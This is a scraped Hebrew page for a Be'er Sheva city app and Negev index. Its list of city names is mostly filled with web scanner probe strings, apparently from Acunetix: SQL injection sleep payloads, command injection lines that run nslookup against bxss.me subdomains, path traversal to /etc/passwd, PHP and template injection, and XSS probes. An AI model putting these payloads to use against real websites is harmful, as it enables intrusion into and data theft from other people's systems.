• 29 יולי 2021

האפליקציה של ב’’ש

להורדת האפליקציה:
אינדקס נגב
כלהערים
  • `(nslookup hitnutfvoucys8925b.bxss.me||perl -e "gethostbyname('hitnutfvoucys8925b.bxss.me')")`
  • ^(#$!@#$)(()))******
  • -1 OR 2+322-322-1=0+0+0+1 --
  • -1 OR 2+517-517-1=0+0+0+1
  • -1' OR 2+256-256-1=0+0+0+1 --
  • -1' OR 2+484-484-1=0+0+0+1 or 'sHL9w84V'='
  • -1" OR 2+741-741-1=0+0+0+1 --
  • ;(nslookup hitvyqjtisnyi7349a.bxss.me||perl -e "gethostbyname('hitvyqjtisnyi7349a.bxss.me')")|(nslookup hitvyqjtisnyi7349a.bxss.me||perl -e "gethostbyname('hitvyqjtisnyi7349a.bxss.me')")&(nslookup hit
  • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  • !(()&&!|*|*|
  • ../../../../../../../../../../../../../../etc/passwd
  • ../../../../../../../../../../../../../../windows/win.ini
  • ../location
  • ';print(md5(31337));$a='
  • '.gethostbyname(lc('hitan'.'bdxibuly0ecaa.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(75).chr(121).chr(85).'
  • '.print(md5(31337)).'
  • '"
  • '"()&%[removed]KpMY(9071)[removed]
  • '"()&%[removed]MONX(9493)[removed]
  • '"()&%[removed]MX1h(9060)[removed]
  • '"()&%[removed]Q7hR(9327)[removed]
  • '"()&%[removed]R5pu(9639)[removed]
  • '"()&%[removed]RoPV(9701)[removed]
  • '"()&%[removed]w3ZX(9234)[removed]
  • '"()&%[removed]YHLF(9021)[removed]
  • '+'A'.concat(70-3).concat(22*4).concat(108).concat(77).concat(109).concat(85)+(require'socket' Socket.gethostbyname('hitbv'+'stlwmdicb30f5.bxss.me.')[3].to_s)+'
  • '+response.write(9118386*9817088)+'
  • ";print(md5(31337));$a="
  • ".gethostbyname(lc("hitfz"."kkzlzxjpf4a4e.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(86).chr(109).chr(83)."
  • "+"A".concat(70-3).concat(22*4).concat(115).concat(76).concat(102).concat(76)+(require"socket" Socket.gethostbyname("hitph"+"kreyidfk5d261.bxss.me.")[3].to_s)+"
  • "+response.write(9118386*9817088)+"
  • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  • (nslookup hitwlagwicvku6e9fc.bxss.me||perl -e "gethostbyname('hitwlagwicvku6e9fc.bxss.me')")
  • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • )
  • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • @@2k9Rp
  • /xfs.bxss.me
  • &(nslookup hitqqareacamja7c95.bxss.me||perl -e "gethostbyname('hitqqareacamja7c95.bxss.me')")&'\"`0&(nslookup hitqqareacamja7c95.bxss.me||perl -e "gethostbyname('hitqqareacamja7c95.bxss.me')")&`'
  • &echo; vmmkme$()\ fxdagc\nz^xyu||a #' &echo; vmmkme$()\ fxdagc\nz^xyu||a #|" &echo; vmmkme$()\ fxdagc\nz^xyu||a #
  • <!--
  • <%={{={@{#{${acx}}%>
  • |(nslookup hitrcabapetsu59a0b.bxss.me||perl -e "gethostbyname('hitrcabapetsu59a0b.bxss.me')")
  • |echo sokeyc$()\ ckxydq\nz^xyu||a #' |echo sokeyc$()\ ckxydq\nz^xyu||a #|" |echo sokeyc$()\ ckxydq\nz^xyu||a #
  • $(nslookup hithulsyrxdxqb4e9e.bxss.me||perl -e "gethostbyname('hithulsyrxdxqb4e9e.bxss.me')")
  • ${@print(md5(31337))}
  • ${@print(md5(31337))}\
  • ${10000431+10000115}
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  • 1 waitfor delay '0:0:15' --
  • 1'"
  • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  • 1%27%22
  • 12345'"\'\");|]*{ <>''????
  • 1BMryMLii8O
  • 1some_inexistent_file_with_long_name.jpg
  • 2bjSyWx2'; waitfor delay '0:0:15' --
  • Acu1715<s1﹥s2ʺs3ʹuca1715
  • Acu4711<s1﹥s2ʺs3ʹuca4711
  • Acu5187<s1﹥s2ʺs3ʹuca5187
  • Acu6822<s1﹥s2ʺs3ʹuca6822
  • Acu7016<s1﹥s2ʺs3ʹuca7016
  • Acu7227<s1﹥s2ʺs3ʹuca7227
  • Acu8697<s1﹥s2ʺs3ʹuca8697
  • Acux2555z1z2abcxuca2555
  • Acux2585z1z2abcxuca2585
  • Acux4048z1z2abcxuca4048
  • Acux4352z1z2abcxuca4352
  • Acux5314z1z2abcxuca5314
  • Acux8110z1z2abcxuca8110
  • Acux9105z1z2abcxuca9105
  • Acx__${98991*97996}__::.x
  • Acx[[${98991*97996}]]xca
  • Acx{{98991*97996}}xca
  • Ajax_register
  • Ajax_register/.
  • Bxss.me
  • Bxss.me/t/xss.html?
  • Delhi
  • Echo vxqejm$()\ olxfjl\nz^xyu||a #' &echo; vxqejm$()\ olxfjl\nz^xyu||a #|" &echo; vxqejm$()\ olxfjl\nz^xyu||a #
  • Http://bxss.me/t/fit.txt
  • Http://bxss.me/t/fit.txt?.jpg
  • HttP://bxss.me/t/xss.html?
  • Http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  • If(now()=sysdate(),sleep(15),0)
  • IKIg9wCI
  • Location
  • Location'"()&%[removed]KpMY(9184)[removed]
  • Location'"()&%[removed]MONX(9150)[removed]
  • Location'"()&%[removed]MX1h(9963)[removed]
  • Location'"()&%[removed]Q7hR(9462)[removed]
  • Location'"()&%[removed]R5pu(9264)[removed]
  • Location'"()&%[removed]RoPV(9400)[removed]
  • Location'"()&%[removed]w3ZX(9855)[removed]
  • Location'"()&%[removed]YHLF(9091)[removed]
  • Location'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • Location[removed]KpMY(9406)[removed]
  • Location[removed]MX1h(9549)[removed]
  • Location[removed]Q7hR(9629)[removed]
  • Location[removed]R5pu(9595)[removed]
  • Location[removed]RoPV(9812)[removed]
  • Location[removed]YHLF(9120)[removed]
  • Location&n907505=v963020
  • Location
  • LocationJULDX[!+!]
  • LocationNYKVO[!+!]
  • Location2YEX1[!+!]
  • Location3TPTQ[!+!]
  • LocationKQ5BQ[!+!]
  • LocationYDRJ4[!+!]
  • Location9051636
  • Location9072725
  • Location9229959
  • Location9321971
  • Location9397383
  • Location9845475
  • Location9871744
  • Location9916722
  • P0RBI3mk')) OR 167=(SELECT 167 FROM PG_SLEEP(15))--
  • PuY1WIC8') OR 335=(SELECT 335 FROM PG_SLEEP(15))--
  • Response.write(9118386*9817088)
  • Y1RQb9Jv' OR 380=(SELECT 380 FROM PG_SLEEP(15))--
  • ZlRDVllidHo=
  • Zo4ISG7D
  • אופקים
  • ב"ש
  • באר שבע
  • דימונה
  • נתיבות
  • עומר
  • ראשון לציון
  • רעננה